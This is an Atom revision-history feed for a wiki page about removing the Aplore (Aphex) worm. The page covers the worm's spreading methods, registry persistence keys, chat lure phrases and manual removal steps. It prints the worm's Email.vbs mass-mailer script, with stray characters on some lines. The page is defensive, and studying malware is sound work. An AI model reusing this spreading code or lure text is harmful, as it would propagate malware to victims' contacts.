<?xml version="1.0"?>
<?xml-stylesheet type="text/css" href="http://wiki.darenet.org/skins/common/feed.css?12"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>http://wiki.darenet.org/index.php?action=history&amp;feed=atom&amp;title=Aplore_Worm_Removal</id>
		<title>Aplore Worm Removal - Revision history</title>
		<link rel="self" type="application/atom+xml" href="http://wiki.darenet.org/index.php?action=history&amp;feed=atom&amp;title=Aplore_Worm_Removal"/>
		<link rel="alternate" type="text/html" href="http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;action=history"/>
		<updated>2026-05-02T14:19:09Z</updated>
		<subtitle>Revision history for this page on the wiki</subtitle>
		<generator>MediaWiki 1.15.1</generator>

	<entry>
		<id>http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;diff=5198&amp;oldid=prev</id>
		<title>Admin at 23:05, 29 December 2009</title>
		<link rel="alternate" type="text/html" href="http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;diff=5198&amp;oldid=prev"/>
				<updated>2009-12-29T23:05:38Z</updated>
		
		<summary type="html">&lt;p&gt;&lt;/p&gt;

		&lt;table style=&quot;background-color: white; color:black;&quot;&gt;
		&lt;col class='diff-marker' /&gt;
		&lt;col class='diff-content' /&gt;
		&lt;col class='diff-marker' /&gt;
		&lt;col class='diff-content' /&gt;
		&lt;tr valign='top'&gt;
		&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Older revision&lt;/td&gt;
		&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Revision as of 23:05, 29 December 2009&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 143:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 143:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Restart your computer.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Restart your computer.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;-&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;[[Category:&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Documentation&lt;/del&gt;]] [[Category:Exploits Prevention]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;[[Category:&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;All&lt;/ins&gt;]] [[Category:Exploits Prevention]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;!-- diff generator: internal 2026-05-02 14:17:44 --&gt;

&lt;!-- diff cache key wiki:diff:version:1.11a:oldid:5099:newid:5198 --&gt;
&lt;/table&gt;</summary>
		<author><name>Admin</name></author>	</entry>

	<entry>
		<id>http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;diff=5099&amp;oldid=prev</id>
		<title>Admin at 03:53, 28 December 2009</title>
		<link rel="alternate" type="text/html" href="http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;diff=5099&amp;oldid=prev"/>
				<updated>2009-12-28T03:53:13Z</updated>
		
		<summary type="html">&lt;p&gt;&lt;/p&gt;

		&lt;table style=&quot;background-color: white; color:black;&quot;&gt;
		&lt;col class='diff-marker' /&gt;
		&lt;col class='diff-content' /&gt;
		&lt;col class='diff-marker' /&gt;
		&lt;col class='diff-content' /&gt;
		&lt;tr valign='top'&gt;
		&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Older revision&lt;/td&gt;
		&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Revision as of 03:53, 28 December 2009&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 143:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 143:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Restart your computer.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Restart your computer.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;-&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;[[Category:Exploits Prevention]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;[[Category:Documentation]] &lt;/ins&gt;[[Category:Exploits Prevention]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;!-- diff generator: internal 2026-05-02 14:18:35 --&gt;

&lt;!-- diff cache key wiki:diff:version:1.11a:oldid:713:newid:5099 --&gt;
&lt;/table&gt;</summary>
		<author><name>Admin</name></author>	</entry>

	<entry>
		<id>http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;diff=713&amp;oldid=prev</id>
		<title>Admin:&amp;#32;New page: Also Known As: W32.Aphex@mm, Bloodhound.VBS.Worm, I-Worm.Aphex, W32/Aplore-A, W32/Aplore@MM, Win32.Aphex, WORM_APLORE.A, Aphex, I-Worm.Aphex, Psec, Win32/Aphex.Worm, W32.Aphex@mm  Infectio...</title>
		<link rel="alternate" type="text/html" href="http://wiki.darenet.org/index.php?title=Aplore_Worm_Removal&amp;diff=713&amp;oldid=prev"/>
				<updated>2007-10-27T07:16:00Z</updated>
		
		<summary type="html">&lt;p&gt;New page: Also Known As: W32.Aphex@mm, Bloodhound.VBS.Worm, I-Worm.Aphex, W32/Aplore-A, W32/Aplore@MM, Win32.Aphex, WORM_APLORE.A, Aphex, I-Worm.Aphex, Psec, Win32/Aphex.Worm, W32.Aphex@mm  Infectio...&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Also Known As: W32.Aphex@mm, Bloodhound.VBS.Worm, I-Worm.Aphex, W32/Aplore-A, W32/Aplore@MM, Win32.Aphex, WORM_APLORE.A, Aphex, I-Worm.Aphex, Psec, Win32/Aphex.Worm, W32.Aphex@mm&lt;br /&gt;
&lt;br /&gt;
Infection Length: 319,488 bytes (varies)&lt;br /&gt;
&lt;br /&gt;
Special thanks to Golcor for the removal instructions.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Aplore is a mixture of tried and tested exploits in which all the code used was previously available. It was simply cobbled together into a Delphi file and distributed in various ways:&lt;br /&gt;
&lt;br /&gt;
* Outlook Express email&lt;br /&gt;
* mIRC IRC program&lt;br /&gt;
* XiRC Component for Delphi&lt;br /&gt;
* AOL instant Messenger (AIM)&lt;br /&gt;
* MSN&lt;br /&gt;
* A web server it also drops&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It is a mass mailing worm that spreads itself by creating it's own http webserver on Port 8180 and advertises itself to IRC (Internet Relay Chat) users and to AIM (AOL Instant Messenger) users in an attempt to entice them into running the worm. When run, it creates a VBScript file in the Windows  System Directory, %SysDir%\Email.vbs, that sends itself to all users in the Windows Address Book and closes the Outlook application, and then deletes the Email.vbs script.&lt;br /&gt;
&lt;br /&gt;
It copies itself into the %System% folder usually as psecure20x-cgi-install6.01.bin.hx.com and explorer.exe. To ensure it starts everytime windows is booted it adds the registry value:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Explorer = &lt;br /&gt;
&amp;quot;%SYSTEM%\[filename]&amp;quot; or&lt;br /&gt;
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ResourceMonitor &lt;br /&gt;
= &amp;quot;%SYSTEM%\[filename]&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The web server http service which it spawns on port 8180 uses an index.html file that the main worm drops and is used as a default web page. Anyone recieving a message from an infected user is pointed to that page risking infection for their machine if they download and run the infected file.&lt;br /&gt;
&lt;br /&gt;
If mIRC is installed on the infected machine on drives c: d: or e: in either the Program Files or mirc folder, it drops a script and overwrites the mirc.ini file. An attempt is made to spread with this script when mIRC is next opened.&lt;br /&gt;
&lt;br /&gt;
== Technical Details ==&lt;br /&gt;
&lt;br /&gt;
There are many variants of this worm. This description attempts to address them all in one article.&lt;br /&gt;
&lt;br /&gt;
The main component is written in Delphi and contains IRC spreading routines and an embedded web server. When connected to IRC or AIM, it sends a Web link to IRC channels or AIM contacts that points to the index.html file that was dropped on the infected computer. This Web page asks the visitor to run a copy of the worm.&lt;br /&gt;
&lt;br /&gt;
If a user connects to the server then it sends the previously dropped index.html. The initial component can have any name. Once it is executed it drops three files:&lt;br /&gt;
&lt;br /&gt;
* One of: Syslog.js, Setup.js or Sex.js&lt;br /&gt;
* Clean.vbs&lt;br /&gt;
* Default.ini&lt;br /&gt;
&lt;br /&gt;
=== E-mail ===&lt;br /&gt;
&lt;br /&gt;
When the attached file is executed the worm drops the file email.vbs. This Visual Basic script then attempts to send an email to every person in the Outlook Express address book. It includes an attachement called Psecure20x-cgi-install.version.6.01.bin.hx.com. The Subject and Body of the email are a simple period(.) and the From field contains the name of the infected computer. Once Outlook is closed by the worm, the script email.vbs is deleted. It arrives attached to an email message which contains the following information,&lt;br /&gt;
&lt;br /&gt;
Subject: .&amp;lt;br&amp;gt;&lt;br /&gt;
Body: .&amp;lt;br&amp;gt;&lt;br /&gt;
Attachment: psecure20x-cgi-install.version6.01.bin.hx.com&lt;br /&gt;
&lt;br /&gt;
NB : The Subject and Body fields contain only a &amp;quot;.&amp;quot; (dot, period)&lt;br /&gt;
&lt;br /&gt;
Email.vbs which the Worm creates, runs and deletes contains the following &lt;br /&gt;
code.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On Error Resume Next&lt;br /&gt;
/Dim oFileSystemObject, sScript, sSystem, iIndex&lt;br /&gt;
BSet oFileSystemObject = CreateObject(&amp;quot;Scripting.FileSystemObject&amp;quot;)&lt;br /&gt;
sScript = WScript.ScriptFullName&lt;br /&gt;
/sSystem = oFileSystemObject.GetSpecialFolder(1)&lt;br /&gt;
2Set oOutLook = CreateObject(&amp;quot;Outlook.Application&amp;quot;)&lt;br /&gt;
TFor iIndex = 1 To &lt;br /&gt;
oOutLook.GetNameSpace(&amp;quot;MAPI&amp;quot;).AddressLists(1).AddressEntries.Count&lt;br /&gt;
&amp;quot;Set mMail = oOutLook.CreateItem(0)&lt;br /&gt;
OmMail.To = &lt;br /&gt;
oOutLook.GetNameSpace(&amp;quot;MAPI&amp;quot;).AddressLists(1).AddressEntries(iIndex)&lt;br /&gt;
mMail.Subject = &amp;quot;.&amp;quot;&lt;br /&gt;
mMail.Body = &amp;quot;.&amp;quot;&lt;br /&gt;
QmMail.Attachments.Add(sSystem &amp;amp; &lt;br /&gt;
&amp;quot;\psecure20x-cgi-install.version6.01.bin.hx.com&amp;quot;)&lt;br /&gt;
mMail.Send&lt;br /&gt;
Next&lt;br /&gt;
OutLook.Quit&lt;br /&gt;
FileSystemObject.DeleteFile(sScript)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When the program is executed it copies itself to the Windows System directory as EXPLORER.EXE, creates a file called IPHIST.DAT in the directory the original file was run from before copying and adds a registry entry. IPHIST.DAT is an empty file of 0 bytes and is completely harmless.&lt;br /&gt;
&lt;br /&gt;
=== AIM &amp;amp; MSN Messenger ===&lt;br /&gt;
&lt;br /&gt;
Additional research shows that MSN Messenger users are also vulnerable to infection and the spreading of this worm. The worm hooks AIM and MSN Messenger child windows by looking for the titlebar text. Once one of these messenger windows is detected it replaces the text in the window with the following text.&lt;br /&gt;
&lt;br /&gt;
YourScreenName: btw, download this, (Your IP Address):8180&lt;br /&gt;
&lt;br /&gt;
ie InfectedGuy: btw, download this, http://freeporn@127.0.0.1:8180&lt;br /&gt;
&lt;br /&gt;
Other examples of the text used in spam messages sent from infected computers via AIM and MSN&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 wanted to show you this,&lt;br /&gt;
please check this out,&lt;br /&gt;
hey go to,&lt;br /&gt;
download this,&lt;br /&gt;
see if you can get this to work,&lt;br /&gt;
this is cool,&lt;br /&gt;
tell me what you think about,&lt;br /&gt;
try this,&lt;br /&gt;
I almost forgot about,&lt;br /&gt;
I like this,&lt;br /&gt;
what about,&lt;br /&gt;
have you seen,&lt;br /&gt;
interesting,&lt;br /&gt;
lol,&lt;br /&gt;
wow,&lt;br /&gt;
whoa,&lt;br /&gt;
neat,&lt;br /&gt;
hmm,&lt;br /&gt;
psst,&lt;br /&gt;
hehe,&lt;br /&gt;
haha,&lt;br /&gt;
silly,&lt;br /&gt;
weird,&lt;br /&gt;
cool,&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
NB : In a web address, text preceeding @ is not taken as part of the address, but taken as login password etc. Trying http://trythis@microsoft.com/ would take you to microsoft.com and the trythis@ would be completely ignored as part of the actual address.&lt;br /&gt;
&lt;br /&gt;
=== IRC ===&lt;br /&gt;
&lt;br /&gt;
If you use IRC you are likely to receive messages like the ones below sooner or later:&lt;br /&gt;
&lt;br /&gt;
[[Image:Spam.jpg]]&lt;br /&gt;
&lt;br /&gt;
Messages will be received from any of the nicknames below and each will have a randomly generated 3 digit number appended to the end of the nickname. ie aaren203.&lt;br /&gt;
&lt;br /&gt;
1. The IRC part of the Worm exploits the legitimate XiRC Component for Delphi, written by Martin Bleakley which is not dependent on mIRC in any way. It tries to connect to a server with a random nickname chosen from a list of female names stored in the worm code. It tries to join random channels and message people to visit the web page it created on the infected machine. The message contains the text &amp;quot;FREE PORN:&amp;quot; and the IP address of the infected computer.&lt;br /&gt;
&lt;br /&gt;
2. Using one of the *.js files, Aplore drops c:\default.ini, which contains a mIRC script. This script contains errors which prevent it from executing all the code properly. The *.js file modifies all the the mirc.ini files it can find, then deletes c:\default.ini. When mIRC is next started it tries to send messages out that point to the index.html file on the infected computer.&lt;br /&gt;
&lt;br /&gt;
=== Webserver ===&lt;br /&gt;
&lt;br /&gt;
When the server is started, it listens for connections on port 8180. The page on the URL says that the user has to download a plugin to view the content. Some variants have a REFRESH tag so in one second it offers the worm file for download. When the user chooses to run the file it starts and infects the new system.&lt;br /&gt;
&lt;br /&gt;
== Solution ==&lt;br /&gt;
&lt;br /&gt;
'''Do NOT reboot your machine.'''&lt;br /&gt;
&lt;br /&gt;
If you have mIRC installed, ensure it is closed. Delete the mirc.ini file as it was over written by the virus code. mIRC will rewrite this file properly when you next start it up.&lt;br /&gt;
&lt;br /&gt;
Delete the registry key it created.&lt;br /&gt;
&lt;br /&gt;
Scan your computer with SwatIt trojan scanner or Trend's Housecall Online scanner. Delete any file identified as Aphex or Aplore.&lt;br /&gt;
&lt;br /&gt;
Restart your computer.&lt;br /&gt;
&lt;br /&gt;
[[Category:Exploits Prevention]]&lt;/div&gt;</summary>
		<author><name>Admin</name></author>	</entry>

	</feed>